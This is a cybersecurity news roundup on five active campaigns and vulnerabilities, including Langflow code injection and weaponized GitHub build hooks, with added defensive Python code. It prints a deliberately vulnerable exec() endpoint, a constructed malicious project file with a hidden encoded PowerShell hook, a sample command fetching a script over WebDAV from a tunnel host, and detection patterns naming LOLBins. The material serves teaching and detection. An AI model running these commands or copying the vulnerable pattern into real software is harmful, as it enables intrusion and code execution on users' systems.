Critical Cybersecurity Incidents This Week: From a Langflow Vulnerability to Cloudflare Tunnel Abuse

Today’s Top 5 covers a critical vulnerability in Langflow, renewed exploitation of an older flaw in Zyxel network equipment, a privilege escalation vulnerability in the Linux kernel, a malware campaign run through GitHub repositories, and a new campaign that hides its delivery infrastructure behind Cloudflare Tunnel subdomains.

1. **Critical Vulnerability in Langflow Leads to Flodrix Botnet Infection**

Trend Micro researchers discovered active exploitation of CVE-2025-3248 (CVSS 9.8) in Langflow, a widely used visual builder for LLM agents and workflows. The flaw is a code-injection issue in the /api/v1/validate/code endpoint: the endpoint executed Python submitted in an HTTP POST request without requiring authentication, so a remote attacker gets unauthenticated remote code execution. In the observed attacks the injected code runs a downloader script that installs the Flodrix botnet, which can launch distributed denial-of-service (DDoS) attacks, provide remote access, and install cryptominers and infostealers. Versions prior to 1.3.0 are affected. Trend Micro recommends updating to the latest version and not exposing Langflow instances directly to the internet; access logs of pre-1.3.0 instances should also be reviewed for POST requests to that endpoint from unexpected sources.
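The pattern behind this class of bug is an endpoint whose idea of "validating" code is to run it, reachable without authentication. The following is an added example, not Langflow's source: a minimal vulnerable handler beside a hardened one. The handler names, the request dict shape, the `principal` argument and the `ALLOWED_MODULES` set are assumptions made for illustration. The upstream fix in 1.3.0 was to require authentication on the endpoint; the hardened version below does that and additionally replaces execution with a static parse and import check, which removes the code-execution primitive even if authentication is later misconfigured.

```python
"""A code-validation endpoint: the vulnerable pattern beside a hardened one.

Added example, not Langflow's source. The handler names, the request dict
shape, the `principal` argument and ALLOWED_MODULES are assumptions made for
illustration.
"""
import ast
import importlib.util
from typing import Optional

# Modules a submitted snippet may import (assumption: whatever the service legitimately needs).
ALLOWED_MODULES = frozenset({"math", "json", "re", "datetime", "statistics"})


def validate_code_vulnerable(request: dict) -> dict:
    """Vulnerable pattern: no authentication, and 'validation' means running the code.

    Whatever the caller puts in request["code"] executes with the privileges of
    the server process, so a single unauthenticated POST is enough for RCE.
    """
    code = request.get("code", "")
    try:
        exec(code, {})  # executes attacker-controlled source
        return {"ok": True, "errors": []}
    except Exception as exc:  # the caller even learns why their payload failed
        return {"ok": False, "errors": [repr(exc)]}


def validate_code_hardened(request: dict, principal: Optional[str]) -> dict:
    """Hardened variant: authenticate first, then validate statically without executing.

    `principal` is the identity established by the authentication layer (None
    when the request is anonymous). The code is parsed and compiled but never
    run, and imports are checked against an allowlist instead of being attempted.
    """
    if not principal:
        # Reject anonymous callers before touching the payload at all.
        raise PermissionError("authentication required")

    code = request.get("code", "")
    if not isinstance(code, str) or len(code) > 20_000:
        return {"ok": False, "errors": ["code must be a string of at most 20000 characters"]}

    try:
        tree = ast.parse(code, mode="exec")
        compile(tree, "<submitted>", "exec")  # syntax/compile check only; nothing executes
    except SyntaxError as exc:
        return {"ok": False, "errors": [f"{exc.msg} (line {exc.lineno})"]}
    except ValueError as exc:  # e.g. null bytes in source
        return {"ok": False, "errors": [str(exc)]}

    errors = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names = [alias.name.split(".")[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [(node.module or "").split(".")[0]]
        else:
            continue
        for name in names:
            if name not in ALLOWED_MODULES:
                errors.append(f"import of {name!r} not allowed")
            elif importlib.util.find_spec(name) is None:
                errors.append(f"module {name!r} is not installed")
    return {"ok": not errors, "errors": errors}
```

Note that a `raise RuntimeError(...)` statement is accepted by the hardened validator and rejected by the vulnerable one: the former only checks that the code parses, the latter actually ran it. That difference is the whole vulnerability.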

2. **Exploitation of an Old Vulnerability Targeting Zyxel Network Devices**

GreyNoise has reported a surge in attempts to exploit a vulnerability in Zyxel network devices. Identified as CVE-2023-28771 (CVSS 9.8), this flaw was disclosed and patched in 2023 and allows an unauthenticated attacker to execute operating system commands remotely by sending specially crafted IKE packets to UDP port 500 on the device. On June 16, GreyNoise logged 244 active traffic sources within a 24-hour span, all attempting to deliver malicious IKE packets to UDP/500. The traffic came from a range of sources, including cloud hosting providers; because IKE runs over UDP, those source addresses can be spoofed, so a blocklist built from them is of limited value. Despite the brief activity window, the scale and coordination of the traffic point to an organized campaign rather than background scanning. Affected devices should be updated to firmware that fixes the vulnerability; where IKE/IPsec is not needed, UDP/500 should not be reachable from the internet, and where it is needed, access should be limited to known peer addresses and IKE traffic monitored for spikes in new sources.

3. **CISA Warns of Active Exploitation of Privilege Escalation Vulnerability in Linux**

The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2023-0386 (CVSS 7.8) to its Known Exploited Vulnerabilities (KEV) catalog, signalling that it is being exploited in the wild. The vulnerability is in the Linux kernel's OverlayFS subsystem: when a file carrying the setuid bit or file capabilities was copied up from a lower layer on a nosuid mount, the kernel failed to check that the file's owner was mapped in the current user namespace, so an unprivileged local user who can mount OverlayFS inside a user namespace can end up with a root-owned setuid binary and escalate to root. The fix landed in mainline 6.2 in early 2023 and was backported to distribution kernels, so the raw kernel version alone is not a reliable indicator; check the distribution's advisory for the package build that contains the fix. Public exploit code targets Ubuntu-based systems. Apply the available security updates immediately; where patching has to wait, restricting unprivileged user namespaces removes the usual exploitation path.

4. **Water Curse: GitHub Repository Attack Gains Traction**

Trend Micro researchers report that the Water Curse campaign has been tied to at least 76 GitHub accounts used to distribute weaponized repositories. The repositories pose as legitimate tooling, and the malicious code is hidden in build scripts and project files so that it runs when a developer or DevOps engineer builds the project, kicking off a multi-stage chain of scripts on their machine. The primary objective is to collect credentials and establish backdoors within corporate infrastructure. This is supply-chain poisoning that relies on the victim trusting and building what they cloned. Beyond enabling two-factor authentication (2FA) on all developer accounts, isolating build environments, and signing releases, the practical defence is to review build-time hooks (pre- and post-build events, Exec tasks, install scripts) in any third-party repository before building it, since those run with the developer's privileges.
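Build-time hooks are the place to look: an MSBuild project can run an arbitrary command before or after compilation, and a cloned repository that does so deserves a hard look before anyone runs `dotnet build`. The following is an added example, not Trend Micro's or any project's code. It parses a constructed `.csproj`, lists every pre-/post-build event and `Exec` task, flags the patterns a reviewer would question, and decodes a PowerShell `-enc` payload so the hidden command can be read. The sample project and the indicator list are assumptions made for illustration, not a complete indicator set.

```python
"""Scan MSBuild project files for build-time execution hooks.

Added example, not Trend Micro's or any project's code. SAMPLE_CSPROJ is
constructed; SUSPICIOUS is an assumed reviewer checklist, not a full IoC set.
"""
import base64
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Constructed sample: an ordinary-looking project that runs hidden PowerShell before
# the build and a VBScript after it.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <PreBuildEvent>powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA</PreBuildEvent>
  </PropertyGroup>
  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="cscript //nologo setup.vbs" />
  </Target>
</Project>
"""

# Elements whose text is executed by MSBuild as a shell command.
HOOK_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}

SUSPICIOUS = [
    (re.compile(r"powershell.*?(-enc\b|-encodedcommand\b|-w\s+hidden|-windowstyle\s+hidden|\biex\b|downloadstring)", re.I),
     "PowerShell with encoded/hidden/download options"),
    (re.compile(r"\b(cscript|wscript|mshta|certutil|bitsadmin|rundll32|regsvr32)\b", re.I),
     "LOLBin interpreter"),
    (re.compile(r"https?://", re.I), "remote URL in build step"),
]


def _local(tag: str) -> str:
    """Strip an XML namespace prefix ({ns}Tag -> Tag); older csproj files carry one."""
    return tag.rsplit("}", 1)[-1]


def find_build_hooks(csproj_text: str) -> list:
    """Return every build-time command in the project with the indicators it matches."""
    root = ET.fromstring(csproj_text)
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in HOOK_TAGS and (el.text or "").strip():
            command, location = el.text.strip(), tag
        elif tag == "Exec" and el.get("Command"):
            command, location = el.get("Command"), "Exec task"
        else:
            continue
        reasons = [label for rx, label in SUSPICIOUS if rx.search(command)]
        findings.append({"location": location, "command": command, "reasons": reasons})
    return findings


def decode_encoded_command(command: str) -> Optional[str]:
    """Decode a PowerShell -enc/-EncodedCommand argument (base64 of UTF-16LE text)."""
    m = re.search(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", command, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    for hook in find_build_hooks(SAMPLE_CSPROJ):
        print(hook["location"], "->", hook["command"])
        print("  indicators:", hook["reasons"] or "none")
        decoded = decode_encoded_command(hook["command"])
        if decoded:
            print("  decoded:", decoded)
```

Any hook at all is worth a look in a repository you did not write; the indicator labels only prioritise. The same review applies to `npm` lifecycle scripts and `setup.py`/`pyproject` build hooks, which give the same run-at-build primitive in other ecosystems.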

5. **New Malicious Campaign Uses Cloudflare Tunnel Subdomains for Malware Delivery**

Securonix researchers have documented a multi-stage campaign dubbed SERPENTINE#CLOUD in which attackers abuse Cloudflare Tunnel and WebDAV to host payloads and hide command-and-control traffic, ultimately delivering remote access trojans (RATs). The attack starts with mass phishing emails posing as payment invoices. The attachments contain Windows shortcut (.lnk) files disguised as documents; opening one fetches the next stage over WebDAV from a Cloudflare Tunnel subdomain and works through several scripted stages to an in-memory Python loader that runs the final payload without writing it to disk. The attackers rely on living-off-the-land binaries and on Cloudflare's trusted infrastructure, so the traffic blends in with legitimate use and passes reputation-based filtering. The campaign primarily targets corporate Windows users and, according to the researchers, is built for resilience against detection, since tunnel hostnames are free to create and cheap to rotate. Securonix recommends monitoring for traffic to Cloudflare Tunnel hostnames the organization does not use, WebDAV fetches from the internet, and Python interpreters launched from unusual locations or by script hosts.
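Those three recommendations translate directly into triage rules. The following is an added example, not Securonix's detection content: it runs a small rule set over constructed DNS, HTTP and process-creation events and reports which ones fire. The event field names are assumptions (map them onto your own telemetry), and `trycloudflare.com` is the domain Cloudflare assigns to quick tunnels, which is what these campaigns abuse; organizations that legitimately use quick tunnels should allowlist their own hostnames rather than drop the rule.

```python
"""Triage constructed endpoint and proxy events for SERPENTINE#CLOUD-style tradecraft.

Added example, not Securonix's detection content. Event records are constructed
and their field names are an assumption; map them to your own telemetry.
"""
import re
from typing import Iterable

# Cloudflare quick-tunnel hostnames end in trycloudflare.com; anchor on the suffix so
# lookalikes such as trycloudflare.com.evil.example do not match.
TUNNEL_DOMAIN = re.compile(r"(^|\.)trycloudflare\.com$", re.I)
# Windows WebDAV UNC paths look like \\host@SSL\DavWWWRoot\... or \\host@8080\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+@(SSL|\d+)\\", re.I)
# Directories an ordinary user can write to; a Python interpreter living there is odd.
USER_WRITABLE = re.compile(r"\\(AppData\\|Temp\\|ProgramData\\|Users\\Public\\|Downloads\\)", re.I)
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed events: a benign DNS lookup, then a WebDAV fetch from a tunnel host,
# the cmd.exe launched by a shortcut, a dropped pythonw.exe, and a benign python run.
SAMPLE_EVENTS = [
    {"type": "dns", "host": "corp-sharepoint.example.com"},
    {"type": "http", "host": "quiet-owl-ab12cd.trycloudflare.com", "method": "PROPFIND", "path": "/invoice/"},
    {"type": "process", "image": "C:\\Windows\\System32\\cmd.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": 'cmd.exe /c start "" "\\\\quiet-owl-ab12cd.trycloudflare.com@SSL\\DavWWWRoot\\invoice\\invoice.wsf"'},
    {"type": "process", "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\py\\pythonw.exe",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'pythonw.exe -c "import base64,ctypes"'},
    {"type": "process", "image": "C:\\Program Files\\Python312\\python.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "python.exe manage.py runserver"},
]


def triage(event: dict) -> list:
    """Return the list of rule names that fire on one event (empty if none)."""
    hits = []
    kind = event.get("type")
    if kind in ("dns", "http"):
        host = event.get("host", "")
        if TUNNEL_DOMAIN.search(host):
            hits.append("traffic to Cloudflare quick tunnel")
            if kind == "http" and event.get("method") in ("PROPFIND", "OPTIONS"):
                hits.append("WebDAV method to tunnel host")
    elif kind == "process":
        image = event.get("image", "")
        cmdline = event.get("cmdline", "")
        exe = image.rsplit("\\", 1)[-1].lower()
        parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
        if WEBDAV_UNC.search(cmdline):
            hits.append("WebDAV UNC path on command line")
        if exe in ("python.exe", "pythonw.exe"):
            if USER_WRITABLE.search(image):
                hits.append("python interpreter from user-writable path")
            if parent in SCRIPT_HOSTS:
                hits.append(f"python spawned by {parent}")
    return hits


def scan(events: Iterable[dict]) -> list:
    """Return (index, hits) for every event that triggered at least one rule."""
    flagged = []
    for i, event in enumerate(events):
        hits = triage(event)
        if hits:
            flagged.append((i, hits))
    return flagged


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

The individual rules are noisy on their own (a developer's `cmd.exe` spawning Python is normal); their value is in co-occurrence on one host within a short window, which is what the chain above produces.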